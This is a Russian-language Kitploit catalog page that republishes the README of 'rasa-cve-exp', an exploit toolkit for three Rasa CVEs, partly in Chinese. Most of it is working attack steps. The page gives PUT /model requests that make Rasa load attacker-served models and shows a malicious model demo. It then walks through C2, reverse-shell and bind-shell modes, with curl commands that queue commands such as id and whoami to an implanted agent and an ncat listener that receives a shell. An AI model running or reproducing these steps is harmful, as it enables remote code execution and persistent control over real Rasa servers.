Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
Инструменты/GitHubGitHub/lierbushiwo/rasa-cve-exp
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

13 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

Запустите напрямую

root@kitploit:~
python server-1.py

image-20260604134536291

Произвольная загрузка файлов

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

Результат:

image-20260604135232815

CVE-2021-41127

  • server-1.py

Имя модели по умолчанию evil_import_model.tar.gz

Демо вредоносной модели

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet
Скачать инструмент

Установка вредоносных правил диалога

Введите greet, вернётся PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

Результат

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py изменяет заданные данные в архиве

Запустите напрямую. По умолчанию читает модель из каталога /model, изменяет и сохраняет в текущий каталог как evil_import_model.tar.gz

image-20260604143558105

Укажите IP для обратного соединения

Имя модели по умолчанию evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

Отправляйте данные по очереди

Другие способы эксплуатации (exp)

В реальных сценариях может отличаться

  • server-2.py

Три режима


Режим C2 (HTTP polling, рекомендуется)

root@kitploit:~
Атакующий                     Контейнер Rasa (target)
  │                            │
  ├─ Запустить server-2.py ───┤
  ├─ PUT /model ──→ Загрузить pwnmod.py в /app/
  ├─ PUT /model ──→ Загрузить вредоносную модель → import pwnmod → запуск агента
  │                            │
  │  ← GET /poll?agent=xxx ───┤  Polling каждые 3 сек
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  Получить команду
  │  ← POST /result ──────────┤  Отправить результат
  ├─ /last?agent=xxx ──→ Прочитать результат
root@kitploit:~
# 攻击机启动
python server-2.py --mode c2 --c2-base-url http://<攻击机IP>:8000 --port 8000

# 触发 exploit(两步)
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 下发命令
curl "http://<攻击机IP>:8000/enqueue?cmd=id"

# 等 8 秒后读结果(agent 每 3s 轮询 + 执行时间)
curl "http://<攻击机IP>:8000/last?agent=<hostname>"

# 不指定 agent 也行(走通配符)
curl "http://<攻击机IP>:8000/enqueue?cmd=whoami"
curl "http://<攻击机IP>:8000/last"

Режим Reverse (обратная оболочка)

root@kitploit:~
# 1) 攻击机启动监听
ncat -lvnp 4444

# 2) 攻击机启动 server-2.py
python server-2.py --mode reverse --reverse-host <攻击机IP> --reverse-port 4444 --port 8000

# 3) 触发 exploit
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 4) nc 收到 $ 提示符,直接交互

Режим Bind (прямая оболочка, редко используется)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent 在目标容器内监听 0.0.0.0:4444
# ncat <目标IP> 4444 即可连接

Пояснение портов/адресов

ПараметрЗначение
--port 8000Порт прослушивания самого server-2.py
--c2-base-urlПолный базовый URL для опроса агентом в режиме C2 (должен быть доступен из контейнера)
--reverse-hostЦелевой IP для обратной оболочки (reverse shell)
--reverse-portЦелевой порт для обратной оболочки